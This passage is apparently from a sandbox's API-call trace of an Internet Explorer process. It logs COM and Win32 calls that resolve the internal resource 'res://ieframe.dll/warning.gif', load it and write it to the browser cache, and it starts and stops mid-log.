This=0x9ee13c4, pbstrPath=0x194854 | out: pbstrPath=0x194854*="/warning.gif") returned 0x0 [0159.893] CoInternetParseUrl (in: pwzUrl="/warning.gif", ParseAction=0x13, dwFlags=0x0, pszResult=0x194858, cchResult=0x1000, pcchResult=0x194840, dwReserved=0x0 | out: pszResult="/warning.gif", pcchResult=0x194840) returned 0x0 [0159.893] SysReAllocString (in: pbstr=0x194854*="/warning.gif", psz="/warning.gif" | out: pbstr=0x194854*="/warning.gif") returned 1 [0159.893] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3980 [0159.893] IUnknown:Release (This=0x9ee13c4) returned 0x5 [0159.893] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x19688c, lpFilePart=0x196884 | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x196884*="ieframe.dll") returned 0x1f [0159.893] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3980 | out: hHeap=0x5e0000) returned 1 [0159.893] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.893] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.893] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19888c | out: ppvObject=0x19888c*=0x6e784f9c) returned 0x0 [0159.894] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.894] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/warning.gif", ParseAction=3, dwParseFlags=0x0, pwzResult=0x68d128, cchResult=0x27, pcchResult=0x1988e0, dwReserved=0x0 | out: pwzResult="file://C:\\Windows\\SysWOW64\\ieframe.dll", pcchResult=0x1988e0*=0x27) returned 0x0 [0159.894] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.894] CreateUri (in: pwzURI="res://ieframe.dll/warning.gif", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x194814 | out: ppURI=0x194814*=0x9ee13c4) returned 0x0 [0159.894] IUri:GetHost (in: This=0x9ee13c4, pbstrHost=0x194818 | out: pbstrHost=0x194818*="ieframe.dll") returned 0x0 [0159.894] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194820, cchResult=0x1000, pcchResult=0x194808, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194808) returned 0x0 [0159.894] SysReAllocString (in: pbstr=0x194818*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194818*="ieframe.dll") returned 1 [0159.894] IUri:GetPath (in: This=0x9ee13c4, pbstrPath=0x19481c | out: pbstrPath=0x19481c*="/warning.gif") returned 0x0 [0159.894] CoInternetParseUrl (in: pwzUrl="/warning.gif", ParseAction=0x13, dwFlags=0x0, pszResult=0x194820, cchResult=0x1000, pcchResult=0x194808, dwReserved=0x0 | out: pszResult="/warning.gif", pcchResult=0x194808) returned 0x0 [0159.894] SysReAllocString (in: pbstr=0x19481c*="/warning.gif", psz="/warning.gif" | out: pbstr=0x19481c*="/warning.gif") returned 1 [0159.894] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3840 [0159.894] IUnknown:Release (This=0x9ee13c4) returned 0x5 [0159.895] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x196854, lpFilePart=0x19684c | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x19684c*="ieframe.dll") returned 0x1f [0159.895] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3840 | out: hHeap=0x5e0000) returned 1 [0159.895] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.896] IUnknown:Release (This=0x9ee0784) returned 0x5 [0159.896] IUnknown:AddRef (This=0x9ee0784) returned 0x6 [0159.896] IUnknown:AddRef (This=0x9ee0784) returned 0x7 [0159.896] IUnknown:QueryInterface (in: This=0x9ee0784, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199b28 | out: ppvObject=0x199b28*=0x9ee0784) returned 0x0 [0159.897] IUnknown:Release (This=0x9ee0784) returned 0x7 [0159.897] IUnknown:AddRef (This=0x9ee0784) returned 0x8 [0159.897] IUri:GetScheme (in: This=0x9ee0784, pdwScheme=0xd45298 | out: pdwScheme=0xd45298*=0x12) returned 0x0 [0159.897] IUri:GetSchemeName (in: This=0x9ee0784, pbstrSchemeName=0x199b4c | out: pbstrSchemeName=0x199b4c*="res") returned 0x0 [0159.897] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0159.897] IUri:GetSchemeName (in: This=0x9ee0784, pbstrSchemeName=0x199b0c | out: pbstrSchemeName=0x199b0c*="res") returned 0x0 [0159.897] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0159.897] IUri:GetScheme (in: This=0x9ee0784, pdwScheme=0x199b4c | out: pdwScheme=0x199b4c*=0x12) returned 0x0 [0159.897] IUri:GetScheme (in: This=0x9ee0784, pdwScheme=0x199b4c | out: pdwScheme=0x199b4c*=0x12) returned 0x0 [0159.897] IUnknown:QueryInterface (in: This=0x9ee0784, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199b44 | out: ppvObject=0x199b44*=0x9ee0784) returned 0x0 [0159.899] IUnknown:Release (This=0x9ee0784) returned 0x8 [0159.899] IUnknown:AddRef (This=0x9ee0784) returned 0x9 [0159.899] CreateURLMonikerEx2 (in: pMkCtx=0x0, pUri=0x9ee0784, ppmk=0x199ba8*=0x0, dwFlags=0x1 | out: ppmk=0x199ba8*=0x6c8858) returned 0x0 [0159.899] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.899] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1997a4 | out: ppvObject=0x1997a4*=0x6e784f9c) returned 0x0 [0159.899] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.899] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/warning.gif", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x9ef45b8, cchResult=0x824, pcchResult=0x199abc, dwReserved=0x0 | out: pwzResult="", pcchResult=0x199abc*=0x0) returned 0x800c0011 [0159.899] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.900] GetCurrentThreadId () returned 0xb48 [0159.900] CreateBindCtx (in: reserved=0x0, ppbc=0x199ba0 | out: ppbc=0x199ba0*=0x6c8c18) returned 0x0 [0159.900] IUnknown:AddRef (This=0x6c8c18) returned 0x2 [0159.900] IUnknown:AddRef (This=0x6c8c18) returned 0x3 [0159.900] IUnknown:Release (This=0x6c8c18) returned 0x2 [0159.901] IUnknown:Release (This=0x6c8c18) returned 0x1 [0159.901] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db280 [0159.901] IUnknown:AddRef (This=0x6c8c18) returned 0x2 [0159.901] RegisterBindStatusCallback (in: pBC=0x6c8c18, pBSCb=0xd45110, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0159.901] IUnknown:AddRef (This=0xd45110) returned 0x3 [0159.901] IUnknown:QueryInterface (in: This=0xd45110, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199ac0 | out: ppvObject=0x199ac0*=0xd45118) returned 0x0 [0159.901] IMoniker:RemoteBindToStorage (in: This=0x6c8858, pbc=0x6c8c18, pmkToLeft=0x0, riid=0x6d6f62cc, ppvObj=0x199b30 | out: ppvObj=0x199b30*=0x9ef3a70) returned 0x0 [0159.902] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.902] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19971c | out: ppvObject=0x19971c*=0x6e784f9c) returned 0x0 [0159.902] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.902] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/warning.gif", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x9ef45b8, cchResult=0x824, pcchResult=0x199a30, dwReserved=0x0 | out: pwzResult="", pcchResult=0x199a30*=0x0) returned 0x800c0011 [0159.902] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.902] IUnknown:QueryInterface (in: This=0xd45110, riid=0x703b4e24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x1999f0 | out: ppvObject=0x1999f0*=0xd45110) returned 0x0 [0159.902] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0xd45110, grfBINDF=0x6cb560, pbindinfo=0x6cb624, pstgmed=0x6cb564, grfBINDF2=0x199a4c, pdwReserved=0x6cb624 | out: grfBINDF=0x6cb560*=0x83, pbindinfo=0x6cb624, pstgmed=0x6cb564, grfBINDF2=0x199a4c*=0x0, pdwReserved=0x6cb624*=0x54) returned 0x0 [0159.902] IUnknown:Release (This=0xd45110) returned 0x4 [0159.902] IUnknown:QueryInterface (in: This=0xd45110, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199970 | out: ppvObject=0x199970*=0x0) returned 0x80004002 [0159.902] IServiceProvider:QueryService (in: This=0xd45118, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199970 | out: ppvObject=0x199970*=0x0) returned 0x80004002 [0159.902] GetCurrentThreadId () returned 0xb48 [0159.903] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.903] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.903] IBindStatusCallback:OnStartBinding (This=0xd45110, dwReserved=0xff, pib=0x6cb500) returned 0x0 [0159.903] IUnknown:AddRef (This=0x6cb500) returned 0x2 [0159.903] IUnknown:QueryInterface (in: This=0x6cb500, riid=0x6d6f6148*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x1999cc | out: ppvObject=0x1999cc*=0x6cb530) returned 0x0 [0159.903] IUnknown:Release (This=0x6cb530) returned 0x2 [0159.903] IUnknown:QueryInterface (in: This=0xd45110, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199488 | out: ppvObject=0x199488*=0x0) returned 0x80004002 [0159.903] IServiceProvider:QueryService (in: This=0xd45118, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199488 | out: ppvObject=0x199488*=0x0) returned 0x80004002 [0159.903] GetCurrentThreadId () returned 0xb48 [0159.903] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.903] IClassFactory:CreateInstance (in: This=0x6e784f90, pUnkOuter=0x9ef1630, riid=0x703b4c08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x9ef166c | out: ppvObject=0x9ef166c*=0xd5c210) returned 0x0 [0159.904] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.904] IUnknown:QueryInterface (in: This=0xd5c210, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x9ef16c4 | out: ppvObject=0x9ef16c4*=0xd5c22c) returned 0x0 [0159.904] IUnknown:AddRef (This=0x9ef1630) returned 0x7 [0159.904] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.904] IUnknown:QueryInterface (in: This=0xd5c22c, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x199584 | out: ppvObject=0x199584*=0x0) returned 0x80004002 [0159.904] IUnknown:QueryInterface (in: This=0x9ef1630, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x199584 | out: ppvObject=0x199584*=0x0) returned 0x80004002 [0159.904] IUnknown:QueryInterface (in: This=0xd5c210, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x199584 | out: ppvObject=0x199584*=0x0) returned 0x80004002 [0159.904] IUnknown:AddRef (This=0xd5c22c) returned 0x8 [0159.904] IUnknown:AddRef (This=0x9ef1630) returned 0x8 [0159.904] IUnknown:AddRef (This=0xd5c210) returned 0x0 [0159.905] IUnknown:QueryInterface (in: This=0xd5c210, riid=0x703b6e30*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x199530 | out: ppvObject=0x199530*=0x0) returned 0x80004002 [0159.905] IUnknown:QueryInterface (in: This=0xd5c210, riid=0x703b4844*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x199530 | out: ppvObject=0x199530*=0x0) returned 0x80004002 [0159.905] IInternetProtocolRoot:Start (This=0xd5c22c, szUrl="res://ieframe.dll/warning.gif", pOIProtSink=0x9ef1628, pOIBindInfo=0x9ef1630, grfPI=0x0, dwReserved=0x0) returned 0x0 [0159.905] IUnknown:AddRef (This=0x9ef1628) returned 0x9 [0159.905] IUnknown:AddRef (This=0x9ef1630) returned 0xa [0159.905] IInternetBindInfo:GetBindInfo (in: This=0x9ef1630, grfBINDF=0xd5c248, pbindinfo=0xd5c250 | out: grfBINDF=0xd5c248*=0x1000c3, pbindinfo=0xd5c250) returned 0x0 [0159.905] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db670 [0159.905] CreateUri (in: pwzURI="res://ieframe.dll/warning.gif", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x1971dc | out: ppURI=0x1971dc*=0x9ee13c4) returned 0x0 [0159.905] IUri:GetHost (in: This=0x9ee13c4, pbstrHost=0x1971e0 | out: pbstrHost=0x1971e0*="ieframe.dll") returned 0x0 [0159.906] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x1971e8, cchResult=0x1000, pcchResult=0x1971d0, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x1971d0) returned 0x0 [0159.906] SysReAllocString (in: pbstr=0x1971e0*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x1971e0*="ieframe.dll") returned 1 [0159.906] IUri:GetPath (in: This=0x9ee13c4, pbstrPath=0x1971e4 | out: pbstrPath=0x1971e4*="/warning.gif") returned 0x0 [0159.906] CoInternetParseUrl (in: pwzUrl="/warning.gif", ParseAction=0x13, dwFlags=0x0, pszResult=0x1971e8, cchResult=0x1000, pcchResult=0x1971d0, dwReserved=0x0 | out: pszResult="/warning.gif", pcchResult=0x1971d0) returned 0x0 [0159.906] SysReAllocString (in: pbstr=0x1971e4*="/warning.gif", psz="/warning.gif" | out: pbstr=0x1971e4*="/warning.gif") returned 1 [0159.906] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3958 [0159.906] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6d30 [0159.906] IsCharSpaceW (wch=0x77) returned 0 [0159.906] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3b10 [0159.906] IUnknown:Release (This=0x9ee13c4) returned 0x3 [0159.906] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x60) returned 0x6ed00000 [0159.907] PathFindFileNameW (pszPath="ieframe.dll") returned="ieframe.dll" [0159.907] StrCmpICW (pszStr1="ieframe.dll", pszStr2="shdoclc.dll") returned -10 [0159.907] StrCmpICW (pszStr1="ieframe.dll", pszStr2="shdoclc") returned -10 [0159.907] FindResourceExW (hModule=0x6ed00000, lpType=0x17, lpName="warning.gif", wLanguage=0x0) returned 0x0 [0159.907] FindResourceExW (hModule=0x6ed00000, lpType=0x83e, lpName="warning.gif", wLanguage=0x0) returned 0x9d5a700 [0159.907] LoadResource (hModule=0x6ed00000, hResInfo=0x9d5a700) returned 0x9ed51b0 [0159.907] LockResource (hResData=0x9ed51b0) returned 0x9ed51b0 [0159.907] VirtualQuery (in: lpAddress=0x9ed51b0, lpBuffer=0x1991cc, dwLength=0x1c | out: lpBuffer=0x1991cc*(BaseAddress=0x9ed5000, AllocationBase=0x9d50000, AllocationProtect=0x2, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.907] SizeofResource (hModule=0x6ed00000, hResInfo=0x9d5a700) returned 0x426 [0159.908] CreateAsyncBindCtxEx (in: pbc=0x0, dwOptions=0x0, pBSCb=0x0, pEnum=0x0, ppBC=0x199240*=0x0, reserved=0x0 | out: ppBC=0x199240*=0x6d8428) returned 0x0 [0159.908] CreateUri (in: pwzURI="res://ieframe.dll/warning.gif", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x199210 | out: ppURI=0x199210*=0x9ee13c4) returned 0x0 [0159.908] IUri:GetProperties (in: This=0x9ee13c4, pdwFlags=0x199228 | out: pdwFlags=0x199228*=0x29b57) returned 0x0 [0159.908] IUnknown:QueryInterface (in: This=0x9ee13c4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1991ec | out: ppvObject=0x1991ec*=0x9ee13c4) returned 0x0 [0159.908] IUnknown:Release (This=0x9ee13c4) returned 0x4 [0159.908] IUnknown:AddRef (This=0x9ee13c4) returned 0x5 [0159.908] IUri:GetScheme (in: This=0x9ee13c4, pdwScheme=0x1991b4 | out: pdwScheme=0x1991b4*=0x12) returned 0x0 [0159.908] IUnknown:QueryInterface (in: This=0x9ee13c4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199174 | out: ppvObject=0x199174*=0x9ee13c4) returned 0x0 [0159.909] IUnknown:Release (This=0x9ee13c4) returned 0x5 [0159.909] IUnknown:AddRef (This=0x9ee13c4) returned 0x6 [0159.909] StrCmpICW (pszStr1="ieframe.dll", pszStr2="ieframe.dll") returned 0 [0159.909] IUnknown:Release (This=0x9ee13c4) returned 0x5 [0159.909] IUnknown:QueryInterface (in: This=0x9ee13c4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1991ec | out: ppvObject=0x1991ec*=0x9ee13c4) returned 0x0 [0159.909] IUnknown:Release (This=0x9ee13c4) returned 0x5 [0159.909] IUnknown:AddRef (This=0x9ee13c4) returned 0x6 [0159.910] FindMimeFromData (in: pBC=0x6d8428, pwzUrl="/warning.gif", pBuffer=0x0, cbSize=0x0, pwzMimeProposed=0x0, dwMimeFlags=0x0, ppwzMimeOut=0x199244, dwReserved=0x0 | out: ppwzMimeOut=0x199244*="image/gif") returned 0x0 [0159.910] IUnknown:Release (This=0x9ee13c4) returned 0x5 [0159.910] IInternetProtocolSink:ReportProgress (This=0x9ef1628, ulStatusCode=0x16, szStatusText="image/gif") returned 0x0 [0159.910] IBindStatusCallback:OnProgress (This=0xd45110, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, szStatusText="image/gif") returned 0x0 [0159.911] IBindCtx:GetObjectParam (in: This=0x6c8c18, pszKey="__DWNBINDINFO", ppunk=0x199098 | out: ppunk=0x199098*=0x0) returned 0x80004005 [0159.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dc880 [0159.911] StrChrW (lpStart="image/gif", wMatch=0x3b) returned 0x0 [0159.911] StrCmpNICW (lpStr1="text/", lpStr2="image", nChar=5) returned 11 [0159.911] StrCmpNICW (lpStr1="application/", lpStr2="image/gif", nChar=12) returned -8 [0159.911] IUnknown:Release (This=0x9ee13c4) returned 0x4 [0159.911] IUnknown:Release (This=0x9ee13c4) returned 0x3 [0159.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="res://ieframe.dll/warning.gif", cchWideChar=-1, lpMultiByteStr=0x198db8, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="res://ieframe.dll/warning.gif", lpUsedDefaultChar=0x0) returned 30 [0159.911] CreateUrlCacheEntryA (in: lpszUrlName="res://ieframe.dll/warning.gif", dwExpectedFileSize=0x426, lpszFileExtension=0x0, lpszFileName="", dwReserved=0x0 | out: lpszFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]") returned 1 [0159.912] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]") returned 86 [0159.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x198fd0, cbMultiByte=87, lpWideCharStr=0x1992a0, cchWideChar=260 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]") returned 87 [0159.912] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\vd7ia8jg\\warning[1]"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540 [0159.913] WriteFile (in: hFile=0x540, lpBuffer=0x9ed51b0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x199234, lpOverlapped=0x0 | out: lpBuffer=0x9ed51b0*, lpNumberOfBytesWritten=0x199234*=0x426, lpOverlapped=0x0) returned 1 [0159.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="res://ieframe.dll/warning.gif", cchWideChar=-1, lpMultiByteStr=0x198b8c, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="res://ieframe.dll/warning.gif", lpUsedDefaultChar=0x0) returned 30 [0159.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]", cchWideChar=-1, lpMultiByteStr=0x198fbc, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]", lpUsedDefaultChar=0x0) returned 87 [0159.917] CommitUrlCacheEntryA (lpszUrlName="res://ieframe.dll/warning.gif", lpszLocalFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]", ExpireTime=0x0, LastModifiedTime=0x0, CacheEntryType=0x0, lpHeaderInfo=0x0, dwHeaderSize=0x1, lpszFileExtension=0x0, lpszOriginalUrl=0x0) returned 1 [0159.917] IInternetProtocolSink:ReportProgress (This=0x9ef1628, ulStatusCode=0xe, szStatusText="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]") returned 0x0 [0159.918] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.918] GetProcessHeap () returned 0x5e0000 [0159.918] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x426) returned 0x6bcb70 [0159.918] memcpy_s (in: _Destination=0x6bcb70, _DestinationSize=0x426, _Source=0x9ed51b0, _SourceSize=0x426 | out: _Destination=0x6bcb70) returned 0x0 [0159.918] IInternetProtocolSink:ReportData (This=0x9ef1628, grfBSCF=0xd, ulProgress=0x426, ulProgressMax=0x426) returned 0x0 [0159.918] IInternetProtocol:Read (in: This=0xd5c22c, pv=0x9ef45b8, cb=0x2000, pcbRead=0x1990c0 | out: pv=0x9ef45b8, pcbRead=0x1990c0*=0x426) returned 0x0 [0159.918] IBindStatusCallback:OnProgress (This=0xd45110, ulProgress=0x426, ulProgressMax=0x426, ulStatusCode=0x4, szStatusText="res://ieframe.dll/warning.gif") returned 0x0 [0159.918] QueryPerformanceCounter (in: lpPerformanceCount=0x199058 | out: lpPerformanceCount=0x199058*=3097873739102) returned 1 [0159.919] IBindStatusCallback:OnProgress (This=0xd45110, ulProgress=0x426, ulProgressMax=0x426, ulStatusCode=0xe, szStatusText="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\VD7IA8JG\\warning[1]") returned 0x0 [0159.919] GetCurrentProcessId () returned 0xe14 [0159.919] IBindCtx:GetObjectParam (in: This=0x6c8c18, pszKey="__DWNBINDINFO", ppunk=0x199058 | out: ppunk=0x199058*=0x0) returned 0x80004005 [0159.919] IBindStatusCallback:OnProgress (This=0xd45110, ulProgress=0x426, ulProgressMax=0x426, ulStatusCode=0x6, szStatusText="res://ieframe.dll/warning.gif") returned 0x0 [0159.919] QueryPerformanceCounter (in: lpPerformanceCount=0x199050 | out: lpPerformanceCount=0x199050*=3097873841515) returned 1 [0159.920] QueryPerformanceCounter (in: lpPerformanceCount=0x199058 | out: lpPerformanceCount=0x199058*=3097873859808) returned 1 [0159.920] IInternetProtocol:LockRequest (This=0xd5c22c, dwOptions=0x0) returned 0x0 [0159.920] IBindStatusCallback:RemoteOnDataAvailable (This=0xd45110, 